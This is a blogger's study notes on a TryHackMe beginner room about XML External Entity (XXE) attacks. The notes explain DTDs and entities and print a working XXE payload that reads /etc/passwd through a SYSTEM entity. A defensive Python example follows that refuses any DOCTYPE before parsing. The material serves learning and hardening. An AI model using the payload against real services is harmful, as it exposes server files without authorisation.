TryHackMe: Complete Beginner (Supplements)

author: Nathan Acks
date: 2021-12-09


Deploy the VM

I think I’ve basically done a different version of this room…

Anyways, two types of XML External Entity (XXE) attacks:

eXtensible Markup Language

Some things to remember about XML documents:


The Document Type Definition defines/validates an XML document. For example, the DTD defined as

<!DOCTYPE note [
	<!ELEMENT note (to,from,heading,body)>
	<!ELEMENT to (#PCDATA)>
	<!ELEMENT from (#PCDATA)>
	<!ELEMENT heading (#PCDATA)>
	<!ELEMENT body (#PCDATA)>
]>

validates the XML document

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
	<to>placeholder</to><from>placeholder</from><heading>placeholder</heading>
	<body>XXE attack</body>
</note>

The name of the root element appears immediately after the DOCTYPE keyword, and each ELEMENT declaration takes the form element_name (contained_data). #PCDATA stands for “printable character data.”

The DTD can also define ENTITY declarations: custom shorthands that are referenced the same way as the built-in &amp; and similar entities.

<!DOCTYPE userInfo [
	<!ENTITY name "feast">
]>
<userInfo>&name;</userInfo>

Conveniently, a DTD can be defined inline within the document itself, not just in an included file.

These last two features are what we will leverage to attack applications that accept XML inputs.

XXE Payload

<?xml version="1.0"?>
<!DOCTYPE root [
	<!ENTITY read SYSTEM 'file:///etc/passwd'>
]>
<root>&read;</root>

The SYSTEM keyword tells the parser to load the entity’s content from an external resource, so an entity can pull in other files… possibly quite sensitive ones, depending on the permissions the web server process runs with and how good the application’s input sanitization is.
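To make the two DTD features above (inline DTDs and ENTITY declarations) concrete from the defender’s side, here is an added Python example; it is not from the original notes or from the TryHackMe room. It feeds constructed sample documents through the standard library’s xml.etree.ElementTree to show the inline entity being expanded, and then shows a hardened wrapper that refuses any DOCTYPE before parsing, which is the same policy defusedxml applies with forbid_dtd. The sample documents, the DoctypeForbidden exception and the helper names (reject_doctype, parse_permissive, parse_hardened, classify) are all constructed for this example; xml.parsers.expat’s StartDoctypeDeclHandler hook and ET.fromstring are real standard-library APIs.

```python
"""Inline DTD entities vs. a DOCTYPE-rejecting parser, standard library only.

Everything here is constructed for illustration: the sample documents, the
exception type and the helper names do not come from any real application.
"""
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed sample 1: an inline DTD that declares an internal entity.
INLINE_ENTITY_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE userInfo [
  <!ENTITY name "feast">
]>
<userInfo>&name;</userInfo>"""

# Constructed sample 2: an entity whose content comes from a SYSTEM resource.
EXTERNAL_ENTITY_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY read SYSTEM "file:///etc/passwd">
]>
<root>&read;</root>"""

# Constructed sample 3: the same data with no DTD at all.
PLAIN_DOC = b"""<?xml version="1.0"?>
<userInfo>feast</userInfo>"""


class DoctypeForbidden(ValueError):
    """Raised when an incoming document carries a DOCTYPE declaration."""


def reject_doctype(data: bytes) -> None:
    """Scan with a bare expat parser and refuse the document if it has a DOCTYPE.

    Rejecting the declaration itself is simpler and more robust than trying to
    enumerate dangerous ENTITY forms: an application that never needs a DTD
    should not accept one. This mirrors defusedxml's forbid_dtd policy.
    """
    def on_doctype(name, system_id, public_id, has_internal_subset):
        # expat calls this hook as soon as it sees <!DOCTYPE ...>, before any
        # ENTITY declaration in the internal subset is processed.
        raise DoctypeForbidden(
            f"DOCTYPE {name!r} rejected (system id {system_id!r}, "
            f"internal subset: {bool(has_internal_subset)})"
        )

    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = on_doctype
    scanner.Parse(data, True)  # raises DoctypeForbidden via the hook


def parse_permissive(data: bytes) -> str:
    """Parse the way an application typically does and return the root's text."""
    return ET.fromstring(data).text or ""


def parse_hardened(data: bytes) -> str:
    """Refuse any DTD first, then parse normally."""
    reject_doctype(data)
    return parse_permissive(data)


def classify(parser, data: bytes):
    """Run a parser and report ('parsed', text) or ('rejected', exception name)."""
    try:
        return ("parsed", parser(data))
    except (DoctypeForbidden, ET.ParseError) as exc:
        return ("rejected", type(exc).__name__)


if __name__ == "__main__":
    samples = [
        ("inline entity", INLINE_ENTITY_DOC),
        ("SYSTEM entity", EXTERNAL_ENTITY_DOC),
        ("no DTD", PLAIN_DOC),
    ]
    for label, doc in samples:
        print(f"{label:14} permissive={classify(parse_permissive, doc)}"
              f"  hardened={classify(parse_hardened, doc)}")
```

Running it shows the inline entity silently expanded to “feast” by the permissive parser, while the hardened path rejects both DTD-carrying documents at the DOCTYPE and still parses the DTD-free one normally. The standard library’s ElementTree does not resolve SYSTEM entities itself (it raises ParseError on the unresolved reference), which is why the second sample fails rather than leaking file contents here; parsers that do resolve external entities by default would substitute the file’s contents into the element, which is the XXE the notes describe. Refusing the DOCTYPE up front removes that whole class regardless of parser behaviour, including entity-expansion denial-of-service payloads that never use SYSTEM at all.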